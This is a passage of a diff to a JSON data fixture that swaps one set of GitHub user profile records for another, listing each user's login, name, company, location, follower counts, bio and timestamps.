"U_kgDOB0Z_vw", + "public_repositories_count": 34, + "created_at": "2013-05-30T22:55:16Z", + "updated_at": "2023-05-28T23:53:14Z", + "node_id": "MDQ6VXNlcjQ1NzUwMjA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -389928,24 +647177,24 @@ }, { "model": "github.user", - "pk": 1188, + "pk": 6451, "fields": { - "nest_created_at": "2024-09-11T22:55:13.169Z", - "nest_updated_at": "2024-09-11T22:55:13.169Z", + "nest_created_at": "2024-09-22T07:44:06.871Z", + "nest_updated_at": "2024-09-22T18:46:38.512Z", "name": "", - "login": "monopoler08", + "login": "fanovilla", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/33096466?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/63714262?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2017-10-25T15:06:57Z", - "updated_at": "2023-12-20T16:40:29Z", - "node_id": "MDQ6VXNlcjMzMDk2NDY2", + "public_repositories_count": 18, + "created_at": "2020-04-15T09:55:54Z", + "updated_at": "2024-09-21T08:31:50Z", + "node_id": "MDQ6VXNlcjYzNzE0MjYy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -389953,49 +647202,49 @@ }, { "model": "github.user", - "pk": 1189, + "pk": 6452, "fields": { - "nest_created_at": "2024-09-11T22:55:14.068Z", - "nest_updated_at": "2024-09-11T22:55:14.068Z", - "name": "Ethan Chapman", - "login": "Eiim", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/24627058?v=4", + "nest_created_at": "2024-09-22T07:44:07.189Z", + "nest_updated_at": "2024-09-22T18:46:38.831Z", + "name": "Cuong Tran", + "login": "ctran", + "email": "cuong.tran@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/491?v=4", "company": "", - "location": "Ohio", + "location": "San Diego, CA", "collaborators_count": 0, - "following_count": 9, - "followers_count": 16, - "public_gists_count": 1, - "public_repositories_count": 63, - "created_at": "2016-12-17T20:33:27Z", - "updated_at": "2024-09-10T21:43:56Z", - "node_id": "MDQ6VXNlcjI0NjI3MDU4", - "bio": "Data Science & Statistics student. I code primarily in Java, JS, R, and Python.", - "is_hireable": false, + "following_count": 4, + "followers_count": 66, + "public_gists_count": 29, + "public_repositories_count": 31, + "created_at": "2008-02-20T15:48:15Z", + "updated_at": "2024-08-30T20:31:26Z", + "node_id": "MDQ6VXNlcjQ5MQ==", + "bio": "Currently at @servicenow", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1190, + "pk": 6453, "fields": { - "nest_created_at": "2024-09-11T22:55:18.387Z", - "nest_updated_at": "2024-09-11T22:55:18.387Z", + "nest_created_at": "2024-09-22T07:44:07.503Z", + "nest_updated_at": "2024-09-22T18:46:39.164Z", "name": "", - "login": "blazgvajc", + "login": "ChristianCiach", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/35990879?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19341644?v=4", + "company": "emsysgrid.de", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2018-01-31T07:59:32Z", - "updated_at": "2023-06-22T07:26:43Z", - "node_id": "MDQ6VXNlcjM1OTkwODc5", + "public_repositories_count": 41, + "created_at": "2016-05-13T07:33:21Z", + "updated_at": "2024-07-27T17:36:28Z", + "node_id": "MDQ6VXNlcjE5MzQxNjQ0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390003,49 +647252,49 @@ }, { "model": "github.user", - "pk": 1191, + "pk": 6454, "fields": { - "nest_created_at": "2024-09-11T22:55:23.716Z", - "nest_updated_at": "2024-09-11T23:20:04.509Z", - "name": "", - "login": "hornpeSICKAG", + "nest_created_at": "2024-09-22T07:44:07.817Z", + "nest_updated_at": "2024-09-22T18:46:39.474Z", + "name": "Chaoqi Zhang", + "login": "prncoprs", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/34032461?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10610742?v=4", + "company": "Indiana University Bloomington", "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 0, + "following_count": 120, + "followers_count": 32, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2017-11-27T14:14:44Z", - "updated_at": "2024-09-03T08:22:34Z", - "node_id": "MDQ6VXNlcjM0MDMyNDYx", - "bio": "", + "public_repositories_count": 25, + "created_at": "2015-01-20T07:59:51Z", + "updated_at": "2024-09-04T22:17:06Z", + "node_id": "MDQ6VXNlcjEwNjEwNzQy", + "bio": "CS PhD student at IUB", "is_hireable": false, - "twitter_username": "" + "twitter_username": "ChaoqiZhang" } }, { "model": "github.user", - "pk": 1192, + "pk": 6455, "fields": { - "nest_created_at": "2024-09-11T22:55:24.964Z", - "nest_updated_at": "2024-09-11T22:55:24.964Z", - "name": "", - "login": "sanjeeveejayabalan", + "nest_created_at": "2024-09-22T07:44:14.133Z", + "nest_updated_at": "2024-09-22T18:46:45.678Z", + "name": "Augustus Kling", + "login": "AugustusKling", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/122220065?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/599177?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 0, + "followers_count": 11, "public_gists_count": 0, - "public_repositories_count": 20, - "created_at": "2023-01-08T15:32:30Z", - "updated_at": "2024-08-14T06:01:34Z", - "node_id": "U_kgDOB0juIQ", + "public_repositories_count": 27, + "created_at": "2011-02-03T19:42:57Z", + "updated_at": "2024-06-19T18:21:07Z", + "node_id": "MDQ6VXNlcjU5OTE3Nw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390053,74 +647302,74 @@ }, { "model": "github.user", - "pk": 1193, + "pk": 6456, "fields": { - "nest_created_at": "2024-09-11T22:55:33.195Z", - "nest_updated_at": "2024-09-11T22:55:33.195Z", - "name": "Rohit Kumar", - "login": "rohitcoder", + "nest_created_at": "2024-09-22T07:44:14.755Z", + "nest_updated_at": "2024-09-22T18:46:46.316Z", + "name": "", + "login": "mLuca", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17665703?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1850123?v=4", "company": "", - "location": "India", + "location": "", "collaborators_count": 0, - "following_count": 10, - "followers_count": 83, - "public_gists_count": 6, - "public_repositories_count": 99, - "created_at": "2016-03-05T06:01:41Z", - "updated_at": "2024-09-07T07:44:31Z", - "node_id": "MDQ6VXNlcjE3NjY1NzAz", - "bio": "I do what heroes do: I save the world.", - "is_hireable": true, - "twitter_username": "rohitcoder" + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2012-06-14T12:22:03Z", + "updated_at": "2024-09-20T14:24:06Z", + "node_id": "MDQ6VXNlcjE4NTAxMjM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1194, + "pk": 6457, "fields": { - "nest_created_at": "2024-09-11T22:55:34.028Z", - "nest_updated_at": "2024-09-11T22:56:13.868Z", - "name": "Hritik Vijay", - "login": "Hritik14", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7457065?v=4", + "nest_created_at": "2024-09-22T07:44:26.924Z", + "nest_updated_at": "2024-09-22T18:46:58.668Z", + "name": "Volkan Yazıcı", + "login": "vy", + "email": "volkan@yazi.ci", + "avatar_url": "https://avatars.githubusercontent.com/u/72137?v=4", "company": "", - "location": "", + "location": "The Netherlands", "collaborators_count": 0, - "following_count": 8, - "followers_count": 52, - "public_gists_count": 16, - "public_repositories_count": 94, - "created_at": "2014-05-01T09:22:12Z", - "updated_at": "2024-09-09T05:05:44Z", - "node_id": "MDQ6VXNlcjc0NTcwNjU=", - "bio": "Crazy about software and nature. Would love to talk: hey@hritik.sh", + "following_count": 1, + "followers_count": 173, + "public_gists_count": 12, + "public_repositories_count": 71, + "created_at": "2009-04-09T13:59:09Z", + "updated_at": "2024-04-22T11:00:24Z", + "node_id": "MDQ6VXNlcjcyMTM3", + "bio": "dad | programmer | Java enthusiast | \r\nASF Logging Services (log4j, log4cxx, etc.) PMC member", "is_hireable": true, - "twitter_username": "MrHritik" + "twitter_username": "yazicivo" } }, { "model": "github.user", - "pk": 1195, + "pk": 6458, "fields": { - "nest_created_at": "2024-09-11T22:55:38.170Z", - "nest_updated_at": "2024-09-11T22:55:38.170Z", - "name": "", - "login": "anders-brujordet", + "nest_created_at": "2024-09-22T07:44:27.548Z", + "nest_updated_at": "2024-09-22T18:46:59.310Z", + "name": "Robert", + "login": "robertk3s", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/111341363?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/54725065?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-08-16T07:07:28Z", - "updated_at": "2023-07-31T06:25:35Z", - "node_id": "U_kgDOBqLvMw", + "public_repositories_count": 3, + "created_at": "2019-08-30T20:19:45Z", + "updated_at": "2024-03-04T18:51:57Z", + "node_id": "MDQ6VXNlcjU0NzI1MDY1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390128,24 +647377,49 @@ }, { "model": "github.user", - "pk": 1196, + "pk": 6459, "fields": { - "nest_created_at": "2024-09-11T22:55:39.858Z", - "nest_updated_at": "2024-09-11T22:55:39.858Z", - "name": "Michael Fürmann", - "login": "qroac", - "email": "michael@spicyweb.de", - "avatar_url": "https://avatars.githubusercontent.com/u/165980?v=4", - "company": "Spicy Web", - "location": "Deutschland", + "nest_created_at": "2024-09-22T07:44:27.880Z", + "nest_updated_at": "2024-09-22T18:46:59.620Z", + "name": "Alberto Garcia", + "login": "AlbGarciam", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45308839?v=4", + "company": "Openbank", + "location": "Madrid-Spain", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, + "following_count": 30, + "followers_count": 24, "public_gists_count": 1, - "public_repositories_count": 14, - "created_at": "2009-12-11T06:13:35Z", - "updated_at": "2024-08-15T15:30:20Z", - "node_id": "MDQ6VXNlcjE2NTk4MA==", + "public_repositories_count": 64, + "created_at": "2018-11-24T09:51:10Z", + "updated_at": "2024-09-21T11:49:41Z", + "node_id": "MDQ6VXNlcjQ1MzA4ODM5", + "bio": "iOS developer at Openbank", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 6460, + "fields": { + "nest_created_at": "2024-09-22T07:44:28.820Z", + "nest_updated_at": "2024-09-22T18:47:00.557Z", + "name": "Marek Goldmann", + "login": "goldmann", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43489?v=4", + "company": "Red Hat", + "location": "Poland", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 170, + "public_gists_count": 762, + "public_repositories_count": 239, + "created_at": "2008-12-31T11:19:38Z", + "updated_at": "2024-09-13T11:28:50Z", + "node_id": "MDQ6VXNlcjQzNDg5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390153,24 +647427,74 @@ }, { "model": "github.user", - "pk": 1197, + "pk": 6461, "fields": { - "nest_created_at": "2024-09-11T22:55:41.048Z", - "nest_updated_at": "2024-09-11T23:42:28.479Z", - "name": "", - "login": "anthonyharrison", + "nest_created_at": "2024-09-22T07:44:29.758Z", + "nest_updated_at": "2024-09-22T18:47:01.533Z", + "name": "Niels Basjes", + "login": "nielsbasjes", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8421867?v=4", - "company": "", - "location": "UK", + "avatar_url": "https://avatars.githubusercontent.com/u/240096?v=4", + "company": "@bolcom ", + "location": "Amstelveen, NL", "collaborators_count": 0, - "following_count": 20, - "followers_count": 34, - "public_gists_count": 0, + "following_count": 4, + "followers_count": 105, + "public_gists_count": 2, + "public_repositories_count": 103, + "created_at": "2010-04-09T07:18:57Z", + "updated_at": "2024-07-15T16:52:03Z", + "node_id": "MDQ6VXNlcjI0MDA5Ng==", + "bio": "Principal IT Architect/Inventor at @bolcom .\r\nCommitter and PMC for @apache Avro. Contributor for many of the @apache \"BigData\" projects.", + "is_hireable": false, + "twitter_username": "nielsbasjes" + } +}, +{ + "model": "github.user", + "pk": 6462, + "fields": { + "nest_created_at": "2024-09-22T07:44:30.064Z", + "nest_updated_at": "2024-09-22T18:47:01.849Z", + "name": "Olivier Lamy", + "login": "olamy", + "email": "olamy@apache.org", + "avatar_url": "https://avatars.githubusercontent.com/u/19728?v=4", + "company": "@Kawa-Software", + "location": "Brisbane, Australia", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 176, + "public_gists_count": 135, + "public_repositories_count": 291, + "created_at": "2008-08-06T08:59:05Z", + "updated_at": "2024-08-15T05:47:48Z", + "node_id": "MDQ6VXNlcjE5NzI4", + "bio": "Speaking Aussie English with a strong French accent! Love #OpenSource #Jetty #Jenkins #Apache #ultrarunning. Living #downunder @ Brisbane. ", + "is_hireable": true, + "twitter_username": "olamy" + } +}, +{ + "model": "github.user", + "pk": 6463, + "fields": { + "nest_created_at": "2024-09-22T07:44:30.384Z", + "nest_updated_at": "2024-09-22T18:47:02.159Z", + "name": "Robert Varga", + "login": "rovarga", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3847030?v=4", + "company": "@PantheonTechnologies ", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 27, + "public_gists_count": 1, "public_repositories_count": 37, - "created_at": "2014-08-11T22:16:12Z", - "updated_at": "2024-09-10T12:33:42Z", - "node_id": "MDQ6VXNlcjg0MjE4Njc=", + "created_at": "2013-03-12T20:45:38Z", + "updated_at": "2023-09-11T09:26:18Z", + "node_id": "MDQ6VXNlcjM4NDcwMzA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390178,74 +647502,74 @@ }, { "model": "github.user", - "pk": 1198, + "pk": 6464, "fields": { - "nest_created_at": "2024-09-11T22:55:43.081Z", - "nest_updated_at": "2024-09-11T22:55:43.081Z", - "name": "He Xusheng", - "login": "Moujuruo", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/111495335?v=4", - "company": "Harbin Institute of Technology", - "location": "", + "nest_created_at": "2024-09-22T07:44:30.697Z", + "nest_updated_at": "2024-09-22T18:47:02.479Z", + "name": "Sander Verbruggen", + "login": "sanderv", + "email": "sander@verbruggen.ws", + "avatar_url": "https://avatars.githubusercontent.com/u/734537?v=4", + "company": "VX Company IT Services BV", + "location": "Netherlands", "collaborators_count": 0, "following_count": 6, "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2022-08-18T08:43:46Z", - "updated_at": "2024-09-08T03:19:52Z", - "node_id": "U_kgDOBqVIpw", + "public_repositories_count": 13, + "created_at": "2011-04-17T08:58:42Z", + "updated_at": "2024-05-04T14:52:58Z", + "node_id": "MDQ6VXNlcjczNDUzNw==", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "Sander_V" } }, { "model": "github.user", - "pk": 1199, + "pk": 6465, "fields": { - "nest_created_at": "2024-09-11T22:55:44.757Z", - "nest_updated_at": "2024-09-12T02:08:25.019Z", - "name": "", - "login": "Ranjithkumar-Arumugam-agilysys", + "nest_created_at": "2024-09-22T07:44:31.323Z", + "nest_updated_at": "2024-09-22T18:47:03.128Z", + "name": "Iskandar Abudiab", + "login": "iabudiab", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/129947444?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5612057?v=4", "company": "", - "location": "", + "location": "Karlsruhe, Germany", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 17, + "followers_count": 43, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-04-05T09:36:21Z", - "updated_at": "2024-07-11T06:40:57Z", - "node_id": "U_kgDOB77XNA", + "public_repositories_count": 20, + "created_at": "2013-10-04T14:39:19Z", + "updated_at": "2024-05-15T14:30:54Z", + "node_id": "MDQ6VXNlcjU2MTIwNTc=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "_iabudiab" } }, { "model": "github.user", - "pk": 1200, + "pk": 6466, "fields": { - "nest_created_at": "2024-09-11T22:55:48.384Z", - "nest_updated_at": "2024-09-11T22:55:48.384Z", - "name": "", - "login": "agrawalarpit01", + "nest_created_at": "2024-09-22T07:44:31.632Z", + "nest_updated_at": "2024-09-22T18:47:03.435Z", + "name": "MTG", + "login": "mtgag", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/96225378?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36234449?v=4", + "company": "MTG AG", + "location": "Darmstadt, Germany", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2021-12-16T06:31:50Z", - "updated_at": "2022-11-14T08:50:44Z", - "node_id": "U_kgDOBbxIYg", + "public_repositories_count": 5, + "created_at": "2018-02-07T14:25:49Z", + "updated_at": "2024-04-03T05:54:23Z", + "node_id": "MDQ6VXNlcjM2MjM0NDQ5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390253,24 +647577,24 @@ }, { "model": "github.user", - "pk": 1201, + "pk": 6467, "fields": { - "nest_created_at": "2024-09-11T22:55:51.735Z", - "nest_updated_at": "2024-09-11T22:55:51.735Z", - "name": "", - "login": "abhinavsaxena-webengage", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/101795979?v=4", + "nest_created_at": "2024-09-22T07:44:32.253Z", + "nest_updated_at": "2024-09-22T18:47:04.099Z", + "name": "YS Liu", + "login": "seanly", + "email": "seanly@opsbox.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/232069?v=4", "company": "", - "location": "", + "location": "Box World", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-03-17T08:39:38Z", - "updated_at": "2024-02-21T11:49:02Z", - "node_id": "U_kgDOBhFIiw", + "following_count": 449, + "followers_count": 80, + "public_gists_count": 11, + "public_repositories_count": 209, + "created_at": "2010-03-28T15:51:59Z", + "updated_at": "2024-08-27T11:21:55Z", + "node_id": "MDQ6VXNlcjIzMjA2OQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390278,24 +647602,24 @@ }, { "model": "github.user", - "pk": 1202, + "pk": 6468, "fields": { - "nest_created_at": "2024-09-11T22:56:14.697Z", - "nest_updated_at": "2024-09-11T22:56:14.697Z", + "nest_created_at": "2024-09-22T07:44:38.458Z", + "nest_updated_at": "2024-09-22T18:48:16.320Z", "name": "", - "login": "ThamizhiniyanPandiyan", + "login": "c0d3nh4ck", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/124239736?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/50226641?v=4", "company": "", - "location": "", + "location": "India", "collaborators_count": 0, "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-02-02T06:56:35Z", - "updated_at": "2023-09-13T11:23:31Z", - "node_id": "U_kgDOB2e_eA", + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 17, + "created_at": "2019-05-03T04:59:11Z", + "updated_at": "2024-07-12T10:25:55Z", + "node_id": "MDQ6VXNlcjUwMjI2NjQx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390303,49 +647627,49 @@ }, { "model": "github.user", - "pk": 1203, + "pk": 6469, "fields": { - "nest_created_at": "2024-09-11T22:56:16.308Z", - "nest_updated_at": "2024-09-11T23:07:27.898Z", - "name": "Pooja Shah", - "login": "pooja0805", + "nest_created_at": "2024-09-22T07:44:38.776Z", + "nest_updated_at": "2024-09-22T18:49:08.040Z", + "name": "Peter Schuster", + "login": "peschuster", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/53046887?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/281340?v=4", + "company": "Pilz GmbH & Co. KG @PilzDE", + "location": "Ostfildern, Germany", "collaborators_count": 0, - "following_count": 5, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2019-07-18T12:35:28Z", - "updated_at": "2024-09-03T09:24:35Z", - "node_id": "MDQ6VXNlcjUzMDQ2ODg3", - "bio": "", + "following_count": 9, + "followers_count": 35, + "public_gists_count": 7, + "public_repositories_count": 41, + "created_at": "2010-05-19T12:37:04Z", + "updated_at": "2024-09-17T13:41:15Z", + "node_id": "MDQ6VXNlcjI4MTM0MA==", + "bio": "Electrical Engineer, Software Developer and occasional Video Systems Engineer. Loves to transform ideas into reality.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1204, + "pk": 6470, "fields": { - "nest_created_at": "2024-09-11T22:56:18.073Z", - "nest_updated_at": "2024-09-11T22:56:18.073Z", + "nest_created_at": "2024-09-22T07:44:39.407Z", + "nest_updated_at": "2024-09-22T18:47:11.273Z", "name": "", - "login": "trend-sandy-lin", + "login": "webwart-bln", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/129042268?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/60545462?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-03-27T07:31:43Z", - "updated_at": "2024-05-02T07:50:59Z", - "node_id": "U_kgDOB7EHXA", + "public_repositories_count": 5, + "created_at": "2020-02-01T13:56:47Z", + "updated_at": "2024-02-21T10:29:39Z", + "node_id": "MDQ6VXNlcjYwNTQ1NDYy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390353,74 +647677,74 @@ }, { "model": "github.user", - "pk": 1205, + "pk": 6471, "fields": { - "nest_created_at": "2024-09-11T22:56:19.003Z", - "nest_updated_at": "2024-09-11T22:56:19.003Z", - "name": "SHUBHAM BHINGARDE", - "login": "cdacshubhambhingarde", + "nest_created_at": "2024-09-22T07:44:39.798Z", + "nest_updated_at": "2024-09-22T18:47:11.602Z", + "name": "41786214", + "login": "mckalea", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/145668848?v=4", - "company": "CDAC Mumbai", - "location": "Juhu", + "avatar_url": "https://avatars.githubusercontent.com/u/81175035?v=4", + "company": "RiverSafe", + "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-09-21T10:41:22Z", - "updated_at": "2023-09-21T11:44:08Z", - "node_id": "U_kgDOCK668A", - "bio": "#DevSecOps #SCA \r\nfor my personal github repository https://github.com/Shubham-Bhingarde", + "public_repositories_count": 1, + "created_at": "2021-03-22T15:01:43Z", + "updated_at": "2021-05-14T08:26:17Z", + "node_id": "MDQ6VXNlcjgxMTc1MDM1", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1206, + "pk": 6472, "fields": { - "nest_created_at": "2024-09-11T22:56:20.663Z", - "nest_updated_at": "2024-09-11T22:56:20.663Z", - "name": "", - "login": "kacq", + "nest_created_at": "2024-09-22T07:44:40.449Z", + "nest_updated_at": "2024-09-22T18:47:12.235Z", + "name": "Kristian O'Connor", + "login": "koconnor-dev", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/106887346?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/85152517?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-06-04T19:48:24Z", - "updated_at": "2024-01-23T11:00:49Z", - "node_id": "U_kgDOBl74sg", - "bio": "", + "public_gists_count": 1, + "public_repositories_count": 2, + "created_at": "2021-06-01T06:05:16Z", + "updated_at": "2024-07-31T13:26:54Z", + "node_id": "MDQ6VXNlcjg1MTUyNTE3", + "bio": "What am I doing here?", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1207, + "pk": 6473, "fields": { - "nest_created_at": "2024-09-11T22:56:31.497Z", - "nest_updated_at": "2024-09-11T22:56:31.497Z", + "nest_created_at": "2024-09-22T07:44:40.769Z", + "nest_updated_at": "2024-09-22T18:47:12.550Z", "name": "", - "login": "marcosanchotene", - "email": "marco@pontograu.com", - "avatar_url": "https://avatars.githubusercontent.com/u/14004027?v=4", + "login": "jharwood91", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/100367471?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 2, - "public_repositories_count": 12, - "created_at": "2015-08-27T18:33:25Z", - "updated_at": "2024-08-21T19:41:14Z", - "node_id": "MDQ6VXNlcjE0MDA0MDI3", + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-02-24T15:30:24Z", + "updated_at": "2022-04-04T14:42:19Z", + "node_id": "U_kgDOBft8bw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -390428,99 +647752,174 @@ }, { "model": "github.user", - "pk": 1208, + "pk": 6474, "fields": { - "nest_created_at": "2024-09-11T22:56:33.984Z", - "nest_updated_at": "2024-09-11T22:56:33.984Z", - "name": "", - "login": "robaliias", + "nest_created_at": "2024-09-22T07:44:41.088Z", + "nest_updated_at": "2024-09-22T18:47:12.871Z", + "name": "William E Little Jr", + "login": "bmodotdev", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/44269772?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/90572149?v=4", "company": "", - "location": "", + "location": "Houston, Texas", "collaborators_count": 0, "following_count": 0, "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2018-10-18T15:57:53Z", - "updated_at": "2024-07-31T08:47:57Z", - "node_id": "MDQ6VXNlcjQ0MjY5Nzcy", - "bio": "", + "public_gists_count": 1, + "public_repositories_count": 11, + "created_at": "2021-09-12T17:54:31Z", + "updated_at": "2023-07-02T19:53:22Z", + "node_id": "MDQ6VXNlcjkwNTcyMTQ5", + "bio": "Software Engineer and follower of the Contributor's Covenant:\r\nhttps://www.contributor-covenant.org/version/2/1/code_of_conduct/", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1209, + "pk": 6475, "fields": { - "nest_created_at": "2024-09-11T22:56:35.196Z", - "nest_updated_at": "2024-09-12T02:08:59.468Z", - "name": "Adam Setch", - "login": "setchy", + "nest_created_at": "2024-09-22T07:44:41.718Z", + "nest_updated_at": "2024-09-22T18:47:13.508Z", + "name": "Sophie Wigmore", + "login": "sophiewigmore", + "email": "sophiemwigmore@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/20341599?v=4", + "company": "@VMware", + "location": "New York, NY", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 14, + "public_gists_count": 2, + "public_repositories_count": 46, + "created_at": "2016-07-07T15:45:00Z", + "updated_at": "2024-09-20T17:58:11Z", + "node_id": "MDQ6VXNlcjIwMzQxNTk5", + "bio": "software engineer @ VMware Tanzu", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 6476, + "fields": { + "nest_created_at": "2024-09-22T07:44:42.352Z", + "nest_updated_at": "2024-09-22T18:49:32.738Z", + "name": "Jan R. Biasi", + "login": "janbiasi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/386277?v=4", - "company": "World Kinect", - "location": "Miami, FL", + "avatar_url": "https://avatars.githubusercontent.com/u/4563751?v=4", + "company": "St.Galler Kantonalbank AG | @stgallerkb ", + "location": "Switzerland", "collaborators_count": 0, - "following_count": 173, - "followers_count": 35, - "public_gists_count": 0, - "public_repositories_count": 52, - "created_at": "2010-09-03T09:29:03Z", - "updated_at": "2024-08-24T11:21:46Z", - "node_id": "MDQ6VXNlcjM4NjI3Nw==", - "bio": "🌎 Vice President // Domain Architect @WorldKinect | 👨‍💻 Maintainer of @gitify-app | 🚀 DX & GraphQL Enthusiast", + "following_count": 109, + "followers_count": 58, + "public_gists_count": 35, + "public_repositories_count": 31, + "created_at": "2013-05-29T20:42:52Z", + "updated_at": "2024-09-21T21:51:31Z", + "node_id": "MDQ6VXNlcjQ1NjM3NTE=", + "bio": "Senior Software Engineer, \r\nco-founder at Beyond Souls Records, board member at @rheinklang & passionate electronic music producer.", "is_hireable": false, - "twitter_username": "setchy87" + "twitter_username": "janbiasi" } }, { "model": "github.user", - "pk": 1210, + "pk": 6477, "fields": { - "nest_created_at": "2024-09-11T23:07:17.290Z", - "nest_updated_at": "2024-09-11T23:07:39.442Z", - "name": "Maxime Robert", - "login": "marob", + "nest_created_at": "2024-09-22T07:44:42.672Z", + "nest_updated_at": "2024-09-22T18:47:14.476Z", + "name": "Forest Eckhardt", + "login": "ForestEckhardt", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3486231?v=4", - "company": "@Smile-SA ", + "avatar_url": "https://avatars.githubusercontent.com/u/17186605?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 12, + "public_gists_count": 6, + "public_repositories_count": 39, + "created_at": "2016-02-11T22:10:34Z", + "updated_at": "2024-01-09T22:44:14Z", + "node_id": "MDQ6VXNlcjE3MTg2NjA1", + "bio": "I am a software engineer working at VMware on Paketo Buildpacks.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 6478, + "fields": { + "nest_created_at": "2024-09-22T07:44:48.800Z", + "nest_updated_at": "2024-09-22T18:47:20.708Z", + "name": "Alex Miller", + "login": "Codex-", + "email": "", + "avatar_url": 